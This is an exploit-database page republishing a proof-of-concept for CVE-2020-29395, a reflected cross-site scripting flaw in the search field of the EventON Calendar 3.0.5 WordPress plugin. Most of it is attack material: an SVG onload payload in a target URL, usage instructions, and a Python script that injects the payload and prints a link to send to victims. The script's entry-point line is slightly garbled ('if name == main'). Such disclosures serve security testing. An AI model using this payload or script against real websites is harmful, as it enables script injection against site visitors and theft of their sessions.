Advertisement






Wordpress Plugin EventON Calendar 3.0.5 Reflected Cross-Site Scripting

CVE Category Price Severity
Author Risk Exploitation Type Date
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020120003

Below is a copy:

Wordpress Plugin EventON Calendar 3.0.5 Reflected Cross-Site Scripting
# Exploit Title: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting
# Date: 27.11.2020
# Exploit Author: b3kc4t (Mustafa GUNDOGDU)
# Vendor Homepage: https://www.myeventon.com/
# Version: 3.0.5
# Tested on: Ubuntu 18.04
# CVE : 2020-29395
# Description Link:
https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS

"""
                 ~ VULNERABLITY DETAILS ~
    
    https://target/addons/?q=<svg/onload=alert(/b3kc4t/)>
    
    #
    WordPress sites that use EventOn Calendar cause reflected xss vulnerability to javascript payloads injected 
    into the search field.
    
    #
    The following python code will inject javascript code and print out url that will be sent to victim. 
    If you use unicode caracters for xss , exploit will print page source.

    ##USAGE##
    
    $ sudo python eventon_exploit.py --exploit --url https://target/addons/?q= --payload '<svg/onload=alert(/b3kc4t/)>'

    ##OUTPUT##

    [+] https://target/addons/?q=<svg/onload=alert(/b3kc4t/)>


"""
import requests
import sys
import argparse
from colorama import Fore
        
def vuln_reflected(url, payload):

    s = requests.Session()
    get_request = s.get(url+payload)
    
    if get_request.status_code == 500:
        print(Fore.GREEN+"[-] COULD BE WAF, NOT BE REALIZED XSS INJECTION [-]")

    else:
        content_result = str(get_request.content)
        search_find = content_result.find(payload)

        if search_find != -1:
            print(Fore.GREEN+"[+] "+str(url)+str(payload))

        else:

            print(content_result)


def main():

    desc = "Wordpress EventON Calendar Plugin XSS"
    parser = argparse.ArgumentParser(description=desc)
    exp_option = parser.add_argument_group('')
    parser.add_argument("--exploit", help ="", action='store_true')
    parser.add_argument("--url",help="", type=str, required=False)
    parser.add_argument("--payload",help="",type=str,required=False)

    args = parser.parse_args()

    if args.exploit:

        if args.url:

            if args.payload:
                url = args.url
                payload = args.payload
                vuln_reflected(url, payload)

if name == 'main':
    main()

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum